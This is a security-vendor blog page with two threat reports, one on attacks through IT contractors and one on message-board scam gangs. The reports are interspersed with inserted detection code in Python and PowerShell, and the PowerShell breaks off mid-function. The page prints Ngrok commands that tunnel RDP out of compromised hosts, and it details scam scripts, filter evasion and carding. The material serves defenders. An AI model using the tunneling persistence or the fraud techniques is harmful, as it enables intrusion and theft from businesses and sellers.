Kaspersky Securelist

Trusted relationship attacks: trust, but verify

28 May 2024 - 12:00

The IT outsourcing market continues to demonstrate strong growth globally – such services are becoming increasingly popular. But along with the advantages, such as saved time and resources, delegating non-core tasks creates new challenges in terms of information security. By providing third-party companies (service providers or contractors) with access to their infrastructure, businesses increase the risk of trusted relationship attacks – T1199 in the MITRE ATT&CK classification.

In 2023, trusted relationship cyberattacks ranked among the top three most frequently used attack vectors. In such attacks, attackers first gain access to the service provider’s network, and then, if they manage to obtain active credentials for connecting to the target organization’s network, infiltrate the target infrastructure. In most cases, contractors are small- and medium-sized businesses that are less protected than large enterprises. This is also why IT service providers attract the attention of attackers.

The trusted relationship vector is attractive for attackers because it allows them to carry out large-scale attacks with significantly less effort than other vectors. Attackers only need to gain access to the service provider’s network to expose all its clients to cyberrisk, regardless of their size or industry. Moreover, attackers using legitimate connections often go unnoticed, as their actions within the affected organization’s infrastructure look like the actions of the service provider’s employees. According to 2023 statistics, only one in four affected organizations identified an incident as a result of detecting suspicious activity (launch of hacker tools, malware, network scanners, etc.) in their infrastructure, while the rest discovered they had been infiltrated via a third party only after data leakage or encryption.

How access is set up between the target organization and the service provider

Any way of connecting a contractor to the systems of a target organization – even the most secure way – is a potential point of entry for intruders. However, the customer company often gives the service provider quite a lot of access to its systems, including:

  • allocating various systems for conducting operations;
  • issuing accesses for connecting to the infrastructure;
  • creating domain accounts.

Most often, communication between the service provider and the client takes place via VPN connections and Remote Desktop Protocol (RDP) services. Access is set up using a certificate or a login/password pair, and in rare cases multi-factor authentication is added. Having compromised the service provider’s infrastructure, intruders can obtain user accounts or certificates issued by the target organization, and thereby connect to its systems.

Many companies resort to using remote management utilities such as AnyDesk or Ammyy Admin. Most of these utilities allow automatic access by login/password, but they are vulnerable to brute-force attacks. In addition, if misconfigured, these utilities allow connections from any IP addresses/systems if you have valid credentials.

Access to the internal infrastructure can also be organized using SSH or RDP protocols and an allowlist of IP addresses. With this method, there’s no need to connect to a VPN, but the security risks grow significantly (for example, the possibility of brute-force attacks).

At the same time, organizations find it difficult to monitor service providers’ compliance with security policies. For example, contractors may store credentials for connecting to the target organization’s network in plain text in public directories or in corporate information systems such as Jira or Confluence, which the client’s security service may not be aware of.

How attackers gain access to a service provider’s network

In our incident investigations, we consistently note the use of various initial attack vectors to gain access to the infrastructures of IT outsourcing companies. Let’s consider the three most popular ones, which make up more than 80% of all initial attack vectors.

The most common method of initial compromise is exploiting vulnerabilities in applications accessible from the internet. Thus, to penetrate the infrastructure, attackers most often used vulnerabilities in Microsoft Exchange, Atlassian Confluence, CMS Bitrix, and Citrix VDI.

The second most popular method is the use of compromised credentials. In every third incident where this vector was used, attackers bruteforced passwords for services accessible from the external network: RDP, SSH, and FTP. In other cases, they used data that was stolen before the incident began.

Rounding out the top three is targeted phishing. Attackers continue to refine their multi-step schemes and social engineering methods, often using attached documents and archives containing malware to penetrate the network.

Attack development

By investigating incidents related to trusted relationship attacks, we have identified the most interesting attacker tactics and techniques. We present them here in the order they appear in the attack process. In the incidents we worked on, attackers can be divided into two groups according to the tactics and techniques used: let’s call them Group A and Group B.

  1. Gaining access to service providers
    In most cases, the hack started by exploiting vulnerabilities in software accessible from the internet (Initial Access, Exploit Public-Facing Application, T1190).
  2. Establishing persistence in the service provider’s infrastructure
    Attackers in Group A exclusively used the Ngrok tunneling utility at this stage. They installed it in the service provider’s infrastructure as a service. Only the Windows segment was compromised (Persistence, Create or Modify System Process: Windows Service, T1543.003). Attackers in Group B initially used backdoors for persistence, which were later used to load and launch Ngrok or the remote management utility AnyDesk. As a result, both Windows and Linux segments were compromised. The attackers used the following backdoors:

    In some incidents, Ngrok persistence was achieved through the task scheduler.
  3. Actions after compromising credentials for connecting to target organizations
    Group A, having discovered credentials for connecting to the service provider’s clients’ VPN tunnel, penetrated their infrastructure on the same day: the attackers connected to systems allocated to the contractor via the RDP protocol using accounts allocated for the contractor’s employees (Initial Access, Valid Accounts: Domain Accounts, T1078.002), established persistence using the Ngrok utility (probably in case of losing access to the VPN), and returned to the new victims’ infrastructure after several months. Up to three months could have passed between initial access to the target organization and attack discovery. Group B established persistence in the service provider’s infrastructure and returned after several months to carry out attacks on their clients. Up to three months could have passed between initial access to the contractor and attack discovery.
  4. Actions of attackers in the systems allocated to the service provider in the target organization
    The systems allocated to the service provider in the target organization became the entry point for the attackers. During incident investigations, traces of the launch of numerous utilities were found on these systems:

  5. Lateral movement in the target organization’s network
    For lateral movement within the target organization’s network, the attackers used the RDP protocol (Lateral Movement, Remote Services: Remote Desktop Protocol, T1021.001).
  6. Data collection from workstations and servers of the target organization
    In some incidents, attackers from both groups collected data from workstations and servers (Collection, Data from Local System, T1005), packed it into archives (Collection, Archive Collected Data: Archive via Utility, T1560.001) and uploaded it to external file-sharing resources (Exfiltration, Exfiltration Over Web Service, T1567).
  7. Fulfilling attack objectives
    In most cases, the attackers launched ransomware in the target organization’s infrastructure (Impact, Data Encrypted for Impact, T1486). It’s worth noting that group policies or remote creation of Windows services were often used to distribute ransomware files in the infrastructure. Less frequently, distribution and execution were carried out manually.

Attackers use tunneling utilities (Command and Control, Protocol Tunneling, T1572) or remote access software (Command and Control, Remote Access Software, T1219) for several reasons:

Firstly, this eliminates the need for a VPN, which is necessary to connect to the system in the target infrastructure via the RDP protocol, as the contractor’s employees do. Attackers are often active during non-working hours, and correctly configured monitoring can alert security personnel upon detecting VPN connections at odd hours from suspicious IP addresses (for example, those belonging to public anonymization services). If such activity is detected, the corresponding accounts will most likely be blocked, and, as a result, the attackers will lose access to the infrastructure.

With tunneling and remote access utilities, attackers can gain a secure foothold in the target system. AnyDesk allows you to register this software as a service. We’ve seen several options for establishing persistence through the Ngrok utility:

  • As a service: ngrok.exe service run --config ngrok.yml
  • Manually: ngrok.exe config add-authtoken <TOKEN>, followed by ngrok.exe tcp 3389
  • As a task: ngrok.exe tcp 3389 (the authentication token was set manually before persistence was established, by running ngrok.exe config add-authtoken <TOKEN>)

Secondly, the use of such utilities is convenient for attackers. The presence of a backdoor in the network provides them with unhindered access to the internal infrastructure; however, it’s not always comfortable to interact with the compromised system in this way, so attackers turn to utilities. By forwarding the RDP port through Ngrok or connecting via AnyDesk, the attacker is able to interact with the compromised system more easily.

Thirdly, such utilities are quite difficult to track. Ngrok and AnyDesk are legitimate utilities; they are not detected by antivirus tools as malware and are often used for legitimate purposes. In addition, they allow attackers to hide the IP address of the connection source in the compromised system.

For example, with a regular RDP connection, in the Microsoft-Windows-TerminalServices-LocalSessionManager/Operational.evtx log, we will see connection events (ID 21) or reconnection events (ID 25), where the attacker’s IP address will be indicated in the connection source field (external IP address if the system is accessible from the internet, or internal IP address of another compromised system). In the case of an RDP connection through a tunneling utility, the source connection value in the log will be ::%16777216 – it doesn’t carry any information about the connecting system. In most cases, this artifact will merely indicate a connection through a tunneling utility.
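The triage described above, as an added example (not code from the original article): it walks session logon (ID 21) and reconnect (ID 25) records from the LocalSessionManager/Operational log, flags the ::%16777216 source that only tells you a tunnel was used, and flags sessions outside working hours. The event records and the working-hours window are constructed assumptions.

```python
"""Triage of RDP session events (IDs 21 and 25) from the
Microsoft-Windows-TerminalServices-LocalSessionManager/Operational log.

Added example: the event records below are constructed for illustration;
they mimic the fields of real events but come from no real incident.
"""
from dataclasses import dataclass
from datetime import datetime, time

# Source address recorded when the RDP session arrived through a local
# tunnel (e.g. a port forwarded by Ngrok) rather than directly from a peer.
TUNNEL_SOURCE = "::%16777216"

# Working hours assumed for this example (not from the original article).
WORK_START, WORK_END = time(8, 0), time(19, 0)


@dataclass
class RdpEvent:
    event_id: int          # 21 = session logon, 25 = session reconnect
    timestamp: datetime
    user: str
    source: str            # "Source Network Address" field of the event


# Constructed sample events: a daytime direct connection from an internal
# host, a night-time reconnect that came through a tunnel, a night-time
# logon from an external address, and an event ID the triage must ignore.
SAMPLE_EVENTS = [
    RdpEvent(21, datetime(2024, 5, 20, 10, 12), "CORP\\contractor01", "10.10.5.23"),
    RdpEvent(25, datetime(2024, 5, 21, 2, 47), "CORP\\contractor01", TUNNEL_SOURCE),
    RdpEvent(21, datetime(2024, 5, 21, 3, 5), "CORP\\contractor02", "203.0.113.77"),
    RdpEvent(24, datetime(2024, 5, 21, 9, 0), "CORP\\contractor01", "10.10.5.23"),
]


def triage(events):
    """Return (event, reasons) for every logon/reconnect worth a closer look."""
    findings = []
    for ev in events:
        if ev.event_id not in (21, 25):
            continue
        reasons = []
        if ev.source == TUNNEL_SOURCE:
            # The address carries no peer information; it only says the
            # session came through a tunnel, so look for the tunneling tool
            # (service, scheduled task, AnyDesk logs) on the host itself.
            reasons.append("source is tunnel placeholder, check for Ngrok/AnyDesk")
        if not WORK_START <= ev.timestamp.time() < WORK_END:
            reasons.append("outside working hours")
        if reasons:
            findings.append((ev, reasons))
    return findings


if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(f"{ev.timestamp:%Y-%m-%d %H:%M} id={ev.event_id} {ev.user} "
              f"from {ev.source}: {'; '.join(reasons)}")
```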

AnyDesk creates its own logs. Among them, the most useful for incident investigation are connection_trace.txt and ad.trace/ad_svc.trace, as they are named in Windows. The connection_trace.txt log allows you to quickly identify connections to the analyzed system and their type (User, Token, Password). If the attackers used AnyDesk and the log indicates a Token and Password connection type, it can be concluded that the attacker set up automatic connection by password and, with AnyDesk running, can reconnect to the system at any time. The ad.trace/ad_svc.trace log contains debugging information, which allows you to determine the IP address from which the connection was made. However, it’s worth noting that attackers often delete AnyDesk logs, making it nearly impossible to detect traces of their connections.
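As an added example (not Kaspersky's or AnyDesk's code), the following parses connection_trace.txt and singles out Token and Password logons, i.e. the unattended-access case the paragraph describes; it also treats a missing log as a finding in its own right, since attackers often delete it. The log is assumed to be tab-separated with the columns direction, timestamp, auth type, remote ID and remote alias; the sample lines are constructed.

```python
"""Parse AnyDesk connection_trace.txt and flag unattended-access logons.

Added example, not Kaspersky's or AnyDesk's code. The log is assumed to be
tab-separated with the columns direction, timestamp, auth type, remote ID,
remote alias; the lines below are constructed, not from a real system.
"""
from dataclasses import dataclass
from datetime import datetime

# Constructed sample (tab-separated). Real IDs are nine-digit AnyDesk IDs.
SAMPLE_TRACE = (
    "Incoming\t2024-05-20, 11:02\tUser\t100000001\t100000001\n"
    "Incoming\t2024-05-21, 02:41\tPassword\t100000002\t100000002\n"
    "Incoming\t2024-05-21, 02:55\tToken\t100000002\t100000002\n"
    "Incoming\t2024-05-22, 09:30\tUser\t100000003\t100000003\n"
)

# Auth types that mean nobody at the console had to click "Accept":
# Password = unattended-access password, Token = the remote side saved it.
UNATTENDED = {"Password", "Token"}


@dataclass
class Connection:
    direction: str
    timestamp: datetime
    auth_type: str
    remote_id: str
    remote_alias: str


def parse_trace(text):
    """Parse connection_trace.txt content into Connection records."""
    records = []
    for line in text.splitlines():
        parts = line.rstrip("\n").split("\t")
        if len(parts) < 4:
            continue  # blank or truncated line
        alias = parts[4] if len(parts) > 4 else parts[3]
        records.append(Connection(
            parts[0], datetime.strptime(parts[1], "%Y-%m-%d, %H:%M"),
            parts[2], parts[3], alias))
    return records


def unattended_sessions(text):
    """Incoming connections that used Password or Token authentication.

    A Token after a Password from the same remote ID means the remote side
    stored the password: it can reconnect whenever AnyDesk is running.
    """
    return [c for c in parse_trace(text)
            if c.direction == "Incoming" and c.auth_type in UNATTENDED]


def remote_ids_with_saved_access(text):
    """Remote IDs holding a reusable token for this host (set, may be empty)."""
    return {c.remote_id for c in parse_trace(text) if c.auth_type == "Token"}


def assess(text):
    """Summarise the trace; text=None models a log the attacker deleted."""
    if text is None:
        return {"status": "log missing",
                "note": "AnyDesk present but connection_trace.txt absent; "
                        "treat as possible log deletion, fall back to "
                        "ad_svc.trace, EDR telemetry and network logs"}
    sessions = unattended_sessions(text)
    return {"status": "ok", "unattended": len(sessions),
            "saved_access_ids": sorted(remote_ids_with_saved_access(text))}


if __name__ == "__main__":
    for c in unattended_sessions(SAMPLE_TRACE):
        print(f"{c.timestamp:%Y-%m-%d %H:%M} {c.auth_type:8} from {c.remote_id}")
    print(assess(None)["status"])
```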

Fulfilling attack objectives

The ultimate goals of attacks on service providers and target organizations can vary. For example:

  • Establish persistence in the contractor’s infrastructure and remain undetected for as long as possible in order to gain access to their clients’ infrastructure.
  • Remain undetected for as long as possible in order to obtain confidential information (industrial espionage).
  • Exfiltrate as much data as possible and deploy ransomware or a wiper in the organization’s infrastructure to paralyze its activities. We observed this scenario in most attacks on target organizations.

Conclusion and advice

Practice shows that attackers, remaining undetected, usually stayed in the target organization’s infrastructure for up to three months and managed to gain control over critical servers and hosts in various network segments. Only after this did they proceed to encrypt the data. This is enough time for the information security department to detect the incident and respond to the attackers’ actions.

The results of our incident investigations indicate that in the overwhelming majority of cases, antivirus solutions detected malicious activity, but the antivirus verdicts were not paid due attention. Therefore, if you have an in-house incident response team, keep them alert through training and cyberexercises; if you don’t have one, subscribe to incident response services from a provider who can guarantee the necessary service level via appropriate SLA.

Attacks through trusted relationships are quite difficult to detect because:

  • Connections to the target organization’s VPN from the service provider’s network in the early stages are initiated from legitimate IP addresses.
  • Attackers use legitimate credentials to connect to systems within the target organization’s infrastructure (and otherwise).
  • Attackers increasingly use legitimate tools in their attacks.

Nevertheless, it is possible to detect these attacks by following certain rules. We’ve put together recommendations for service providers and their clients that will help detect trusted relationship attacks early on or avoid them altogether.

If you’re an IT service provider:

  • Ensure proper storage of credentials issued for connecting to your clients’ infrastructure.
  • Set up logging of connections from your infrastructure to your clients’ infrastructure.
  • Promptly install software updates or use additional protection measures for services at the network perimeter.
  • Implement a robust password policy and multi-factor authentication.
  • Monitor the use of legitimate tools that could be exploited by attackers.

If your organization uses the services of IT outsourcing companies:

  • When allowing service providers into your infrastructure, give them time-limited access to necessary hosts only.
  • Monitor VPN connections: which account was authorized, at what time, and from which IP address.
  • Implement a robust password policy and multi-factor authentication for VPN connections.
  • Limit the privileges of accounts issued to service providers, applying the principle of least privilege.
  • Apply the same information security requirements to third parties connecting to the internal infrastructure as to hosts in the internal network.
  • Identify situations where chains of different accounts are used to access systems within the infrastructure. For example, if service provider’s employees connect to the VPN using one account and then authenticate via RDP using another account.
  • Monitor the use of remote access and tunneling utilities or other legitimate tools that could be used by attackers.
  • Ensure the detection of the following events within the network perimeter: port scanning, bruteforcing domain account passwords, bruteforcing domain and local account names.
  • Pay special attention to activity within your infrastructure outside of working hours.
  • Back up your data and ensure that your backups are protected as strictly as your primary assets.

Key MITRE ATT&CK tactics and techniques used in trusted relationship attacks

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Trusted Relationship (T1199)
  • Initial Access: Valid Accounts: Domain Accounts (T1078.002)
  • Persistence: Create or Modify System Process: Windows Service (T1543.003)
  • Persistence: Hijack Execution Flow: Dynamic Linker Hijacking (T1574.006)
  • Persistence: Scheduled Task/Job: Scheduled Task (T1053.005)
  • Credential Access: OS Credential Dumping (T1003)
  • Discovery: Network Service Discovery (T1046)
  • Discovery: Account Discovery: Domain Account (T1087.002)
  • Discovery: Remote System Discovery (T1018)
  • Lateral Movement: Remote Services: Remote Desktop Protocol (T1021.001)
  • Collection: Data from Local System (T1005)
  • Collection: Archive Collected Data: Archive via Utility (T1560.001)
  • Command and Control: Protocol Tunneling (T1572)
  • Command and Control: Remote Access Software (T1219)
  • Exfiltration: Exfiltration Over Web Service (T1567)
  • Impact: Data Encrypted for Impact (T1486)
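Two of the recommendations above, spotting account chains (VPN under one account, RDP under another) and activity outside working hours, can be implemented as one correlation over VPN session records and RDP logons. The code below is an added example, not from the original article; the VPN and RDP records are constructed, and their field names and the working-hours window are assumptions rather than any vendor's log schema.

```python
"""Correlate VPN sessions with RDP logons to find account chains.

Added example. Records are constructed; field names are assumptions.
The join key is the address the VPN assigned to the client: an RDP logon
whose source is that address, inside the session's time window, was made
over that VPN session, so the two accounts should normally be the same.
"""
from dataclasses import dataclass
from datetime import datetime, time

WORK_START, WORK_END = time(8, 0), time(19, 0)   # assumed working hours


@dataclass
class VpnSession:
    account: str
    assigned_ip: str      # address the VPN gave the contractor's client
    start: datetime
    end: datetime
    peer_ip: str          # public address the VPN client connected from


@dataclass
class RdpLogon:
    account: str
    source_ip: str        # where the RDP session came from
    when: datetime
    host: str


# Constructed sample: a normal working-day session, and a night-time session
# in which the VPN account is then used to RDP as a different account.
VPN = [
    VpnSession("CORP\\contractor01", "10.200.0.15",
               datetime(2024, 5, 20, 9, 0), datetime(2024, 5, 20, 17, 30),
               "198.51.100.10"),
    VpnSession("CORP\\contractor01", "10.200.0.22",
               datetime(2024, 5, 21, 1, 50), datetime(2024, 5, 21, 4, 10),
               "203.0.113.9"),
]
RDP = [
    RdpLogon("CORP\\contractor01", "10.200.0.15", datetime(2024, 5, 20, 9, 5), "JUMP01"),
    RdpLogon("CORP\\svc_backup", "10.200.0.22", datetime(2024, 5, 21, 2, 12), "FS01"),
    RdpLogon("CORP\\contractor01", "10.200.0.22", datetime(2024, 5, 21, 2, 30), "JUMP01"),
]


def vpn_session_for(logon, sessions):
    """The VPN session whose assigned address and window cover the RDP logon."""
    for s in sessions:
        if s.assigned_ip == logon.source_ip and s.start <= logon.when <= s.end:
            return s
    return None


def find_account_chains(rdp_logons, vpn_sessions):
    """Return (logon, session, reasons) for RDP logons made over a VPN session
    under a different account or outside working hours."""
    findings = []
    for logon in rdp_logons:
        session = vpn_session_for(logon, vpn_sessions)
        if session is None:
            continue  # not via VPN, or no VPN record: out of scope here
        reasons = []
        if session.account.lower() != logon.account.lower():
            reasons.append(f"VPN as {session.account}, RDP as {logon.account}")
        if not WORK_START <= logon.when.time() < WORK_END:
            reasons.append("outside working hours")
        if reasons:
            findings.append((logon, session, reasons))
    return findings


if __name__ == "__main__":
    for logon, session, reasons in find_account_chains(RDP, VPN):
        print(f"{logon.when:%Y-%m-%d %H:%M} {logon.host} <- {logon.account} "
              f"via VPN peer {session.peer_ip}: {'; '.join(reasons)}")
```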

Message board scams

27 May 2024 - 15:00

Marketplace fraud is nothing new. Cybercriminals swindle money out of buyers and sellers alike. Lately, we’ve seen a proliferation of cybergangs operating under the Fraud-as-a-Service model and specializing in tricking users of online marketplaces, in particular, message boards. Criminals are forever inventing new schemes for stealing personal data and funds, which are then quickly distributed to other scammers through automation and the sale of phishing tools. This article explores how these cybergangs operate, how they find and fool victims, with a special look at a campaign targeting users of several European message boards.

Ways to deceive message board users

There are two main types of message board scams.

  1. The first one is when a scammer impersonates the seller and offers to ship an item to the buyer. When the buyer inquires about the terms of delivery and method of payment, the scammer (in the role of the seller) asks for the buyer’s full name, address and phone number, and for online payment. If the victim agrees, they are sent a phishing link to pay for the order (in a third-party messenger or in a dialog box on the message board itself, if the site does not block such links). As soon as the user enters their card details on the fake site, they go straight to the fraudster, who debits the available balance.
    This type of fraud is known as scam 1.0 or a buyer scam, because the attacker poses as the seller to deceive the buyer. It is considered outdated as most message board users are aware of it. Besides, the method involves waiting around for a buyer to take an interest in the item on offer.
  2. Alternatively, the scammer can pose as the buyer and deceive the seller by persuading the seller to dispatch the item and collect payment by “secure transaction”. As in scam 1.0, the attackers send a phishing link to the duped seller via a third-party messenger or directly on the message board. The linked page requests payment card details. If the seller enters these, supposedly to receive payment, the attacker debits all the money from the card.
    This is known as scam 2.0 or a seller scam, because the attacker deceives the seller posing as the buyer. This type of scam is more common than the first, since fewer users are familiar with it, so the chances of finding a victim are greater. What’s more, in scam 2.0 the attacker proactively searches for victims, instead of waiting for one to appear, which speeds up the operation.

In both cases, clicking the link opens a phishing site – a near exact replica of a real trading platform or payment service with just one tiny difference: all the data you enter there will fall into cybercriminal hands. Now for a closer look at the scam 2.0 scheme targeting sellers.

How attackers choose their victims

Scammers have several criteria for selecting potential victims. Primarily they are drawn to ads that sellers have paid to promote. Such ads usually appear at the top of search results and are marked as sponsored. They attract scammers for two reasons: first, a seller who pays for promotion is more likely to have money, and second, they are probably looking for a quickish sale.

Besides the sponsored label, attackers look at the photos in the ad: if they are of professional quality, it is most likely an offer from a store. Scammers are not interested in such ads.

Lastly, attackers need sellers who use a third-party messenger and are willing to provide a phone number. This information becomes known only after contact is made.

How the victim is deceived

The main goal is to persuade the victim to click a phishing link and enter their card details. Like any buyer, the scammer opens the conversation with a greeting and an inquiry about whether the offer is still on the table. After that, the threat actor asks the seller various questions about the product, such as its condition, how long ago they purchased it, why they want to sell it, and so on. Experienced scammers ask no more than three questions to avoid arousing suspicion.

Next, the attacker agrees to buy the item, but says they cannot pick it up in person and pay in cash because, say, they are out of town (here the scammer can get creative), and then asks if delivery with “secure payment” is acceptable.

To deflect potential questions from the seller, the scammer explains the payment scheme in detail, roughly as follows:

  1. I pay for the item on [name of site].
  2. You get a link to receive the money.
  3. You follow the link and enter your card details to receive the payment.
  4. Once you receive the money, the delivery service will contact you to establish your preferred shipping method. Shipping will already be paid for. The delivery service will pack and document the item for you.

If the victim starts to quibble about the payment method, the scammer simply vanishes so as not to waste time. If the seller wants to continue negotiations on the marketplace’s official website, the attacker concludes they smell a rat and will be unlikely to click the phishing link, and so stops replying and begins the search for a new victim.

If, however, the victim clicks the link and enters their card details, the scammers siphon off all available funds. The price of the item is irrelevant: even if the amount asked for in the ad was insignificant, the attackers will steal whatever they can.

What phishing pages look like

In the scam 2.0 scheme, there are two main flavors of phishing site: some mimic the marketplace with the victim’s ad, others a secure payment service such as Twin. Below is an example of a phishing ad and the original on the official site.

Phishing ad

Original ad

As we see, the scammers have produced a near exact copy of the marketplace interface. The fake page differs from the original only in minor details. In particular, instead of the Inserent kontaktieren (“Contact advertiser”) button, the phishing page shows a Receive 150 CHF button. Clicking this button opens a page with a form for entering card details.

Phishing payment pages

If the original link opens a copy of a secure payment service, the card data entry form appears directly on this page, without additional redirections.


Recently, whole groups of scammers specializing in message boards have gained widespread notoriety. Practicing both types of fraud (scam 1.0 and scam 2.0), they unite criminal masterminds, support teams, and low-level players.

We carried out an in-depth study of one such gang targeting message board users in Switzerland. Drawing on this example, we will show the internal structure and organization of activities in such structures.

A cybercriminal group may include the following roles:

  • Topic starter (TS) is the team’s founder and main administrator.
  • Coder is responsible for all technical components: Telegram channels, chats, bots, etc.
  • Refunder is a scammer who handles tech support chats on phishing sites. They help coax the victim into entering their card details, which is the attackers’ ultimate goal. The name “refunder” comes from the fact that the victim is directed to such a “specialist” if they are unhappy about the debit and want a refund.
  • Carder has the task of withdrawing money from the victim’s bank account. As a rule, having received card data, the carder uses it to pay for various goods, services, loans, etc. The process of paying for purchases with someone else’s card is called carding.
  • Motivator provides moral support to scammers. Their task is to make sure the gang remains focused and doesn’t lose heart. The motivator offers podcasts and support in personal messages – a chance to discuss any problems, including personal issues unrelated to fraud. Only large operations have the funds to engage such an “employee”. The motivator works for a percentage of the stolen money.
  • Marketer is responsible for ad campaigns and the design and appearance of bots and accompanying materials – mainly on dark web platforms and Telegram channels for scammers. Advertising is needed to attract new workers.
  • Worker is a scammer who directly deceives victims: finds ads, responds to them, persuades the victim to follow a phishing link, etc. Workers differ from regular scammers only in that they work for a group and make use of its tools and support. As payment, workers receive the funds they steal, minus a commission. The process of defrauding victims is called work.
  • Mentor is an experienced worker assigned to a newcomer.
  • Consummator is a woman who encourages a man to buy gifts and scams money out of him. This role is offered to all women who join closed groups where scammers communicate with each other.

Other scammer terms worth highlighting are:

  • A trusting user who has already been deceived is called a mammoth.
  • The amount of money on the card whose details the victim entered on a phishing website is called logs.
  • The amount debited from the victim’s card is called profit.

Groups communicate in closed groups and channels on Telegram, where they search for new workers, support bots for creating phishing links, track clicks on sent links, as well as keep statistics on each case and the profits of individual workers and the group as a whole.


Cybergangs operate under the Fraud-as-a-Service model, in which the main service consumers are workers. Organizers provide functioning services (channels/chats/bots on Telegram, phishing sites, payment processing, laundering/debiting of funds), as well as moral support and “work” manuals. In return, they take a commission from each payment.

Which countries are targeted by message board scams?

Scam 1.0 and scam 2.0 appeared several years ago, and both schemes can still be found on Russian-language message boards. But scams aimed at the Russian segment are considered old-hat among experienced scammers, since Russian users are tuned in to such schemes and there is a high risk that the attackers will be found and arrested. Therefore, scammers are switching to other countries.

The group at the center of our investigation is primarily focused on Switzerland. In their chat, the scammers cite the reason as the lower risk of getting caught and Swiss-based users’ relative unfamiliarity with this type of scam. In addition, before placing ads or responding to them, the scammers get to know the target country’s market and basic facts about it. For example, what languages and dialects are spoken there. This is to address the victim in their local tongue so as to win trust more easily. According to 2023 data, over two-thirds of the Swiss population aged 15 and older are fluent in at least two languages.

The gang under study also operates in Canada, Austria, France, and Norway.

Work manual

We analyzed the instructions that the group gives to new workers and found out how they get started. First of all, on the dark web, the worker buys accounts on message boards, which they will then scour for victims. Attackers buy accounts rather than create them, since registering on sites carries more risks. That done, the worker creates an account in a third-party messenger. This account is used for communication with the victim. Some users themselves ask for a number to make contact via messenger; in other cases, it is the worker who offers it to reduce the risk of getting banned on the marketplace. Virtual phone numbers are used for registration.

The next step is for the worker to find a proxy server that will provide anonymity and confidentiality. When connecting through this, the marketplace sees the server’s IP address and other information, which allows the attacker to hide their identity data. A proxy is generally considered good if the account is not banned immediately after registration. If a worker uses a VPN, for instance, their accounts will get banned very quickly: connecting via VPN entails a frequent change of IP address and geolocation, which is why sites often identify such accounts as bots.

Besides instructions for getting started, the manual contains templates shared by experienced gang members. The novice worker can use the templates to persuade a victim to make a deal or assuage any concerns about the proposed payment method.

The manual also contains instructions on how to bypass restrictions imposed by sites. Message boards are constantly updated to strengthen internal security, so it’s increasingly difficult for workers to use stock phrases in communicating with users. For example, in November 2023, one popular marketplace banned payments through Tripartie, a commonly used platform for secure transactions in Switzerland, and began blocking accounts for mentioning this system in chats. To get around this update, workers deliberately misspell the name Tripartie. More experienced workers use the Cyrillic alphabet to make the name of the payment system unreadable to the site’s security systems.

Monetizing stolen cards

If the seller enters their card details, the worker sends the data to the carder, who withdraws money from the card within the established limits. There are different ways to do this: by purchasing expensive devices, transferring money to an e-wallet such as PayPal, etc. The carder may also try to have a credit or loan issued in the card owner’s name, or open a deposit. To do this, they use online banks that do not require SMS verification. Some institutions may ask for a passport scan, in which case the carder uses passport data that was stolen or taken from people with no fixed abode. Although this data has nothing to do with the card owner, scammers rely on the fact that online banks do not always check that the passport and card belong to the same person.

Fraud automation with Telegram bots

To simplify the job of workers, the group deploys a phishing Telegram bot. This automates the process of creating phishing pages and communicating with victims, as well as tracking the scammers’ progress. The bot’s main page has buttons for creating a phishing link, viewing a personal profile, quick access to the group’s chats and channels, plus settings.

Home page of the bot

Clicking the button to create a phishing page lets the user select a country for which a unique link will be generated.

Button for selecting a region

Next, the worker specifies the name of the item that the victim wants to buy (if the victim is a buyer) or sell (if a seller).

Specifying item name

With this data the bot is able to create a full copy of the original ad, but on the phishing page. In addition, the worker feeds information from the ad (photo, price, description, etc.) into the bot, so that the victim feels like they are on the original page.

After filling in all the data, the bot provides phishing links in all languages for the target country, for all available message boards, and for both scam types (buyer and seller), from which the worker chooses the most suitable.

Selecting the link

Here the scammer can message the victim by email, messenger or text. The contact information is obtained from the target’s profile on the site, or is wheedled out in a private chat.

Selecting actions to perform with the ad

After a successful phishing attack, the worker can view their in-bot profile, which displays personal information: ID, handle, card balance, amount earned by the worker personally and by the group as a whole.

Personal profile data

Also inside the bot, it is possible to make direct contact with a mentor and to earn additional revenue through the “refer-a-friend” scheme.

In-bot tools

What the phishing links look like

The phishing links that the group creates with its Telegram bot are built along the same pattern:

  • domain/language/action/ad number

The domain most often contains the full or partial name of the message board that the phishing page imitates, but this is not a mandatory component.

Language information may vary, as it depends on the target country. In case of Switzerland, there are the following options: en, it, fr, de.

The action is what the victim purportedly needs to do: pay for the item or receive payment. This element takes one of two values: pay (if the scammer is posing as a seller) or receive (if as a buyer).

The phishing link always ends in the ad number, identical to the original.

Examples of phishing links
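The link pattern above lends itself to a simple triage rule. The following is an added example, not code from the Securelist article or from the group's bot: it flags URLs whose path is built as language/action/ad number and whose host borrows a board's name without being the board's own domain. The language and action values are the ones the article names for Switzerland; the table of legitimate board domains is an assumption for illustration.

```powershell
# Added example: triage helper for links built along domain/language/action/ad number.
# Board-to-domain table is assumed for illustration; the language and action values
# come from the article (en, it, fr, de; pay, receive).
$LegitimateBoards = @{
    'tutti'  = 'tutti.ch'
    'anibis' = 'anibis.ch'
    'post'   = 'post.ch'
}

function Test-BoardPhishingLink {
    [CmdletBinding()]
    param([Parameter(Mandatory = $true)][string]$Url)

    $uri = $null
    if (-not [System.Uri]::TryCreate($Url, [System.UriKind]::Absolute, [ref]$uri)) {
        return [pscustomobject]@{ Url = $Url; Verdict = 'invalid'; Reason = 'not an absolute URL' }
    }

    # A bot-generated link path is exactly /<lang>/<pay|receive>/<ad number>
    $segments = $uri.AbsolutePath.Trim('/') -split '/'
    $pathMatches = (
        ($segments.Count -eq 3) -and
        ($segments[0] -in @('en', 'it', 'fr', 'de')) -and
        ($segments[1] -in @('pay', 'receive')) -and
        ($segments[2] -match '^\d+$')
    )

    # Is the host a real board domain, or does it only borrow a board's name?
    $hostName    = $uri.Host.ToLowerInvariant()
    $isRealBoard = $false
    $imitates    = $null
    foreach ($name in $LegitimateBoards.Keys) {
        $real = $LegitimateBoards[$name]
        if (($hostName -eq $real) -or $hostName.EndsWith('.' + $real)) { $isRealBoard = $true; break }
        if ($hostName -like "*$name*") { $imitates = $real }
    }

    $verdict = 'clean'
    $reason  = 'path does not match the bot pattern'
    if ($isRealBoard) {
        $reason = "host is the board's own domain"
    } elseif ($pathMatches -and $imitates) {
        $verdict = 'high'
        $reason  = "bot link pattern on a look-alike of $imitates"
    } elseif ($pathMatches) {
        # The article notes the board name is not a mandatory part of the domain
        $verdict = 'medium'
        $reason  = 'bot link pattern (lang/pay|receive/ad number) on an unrelated domain'
    } elseif ($imitates) {
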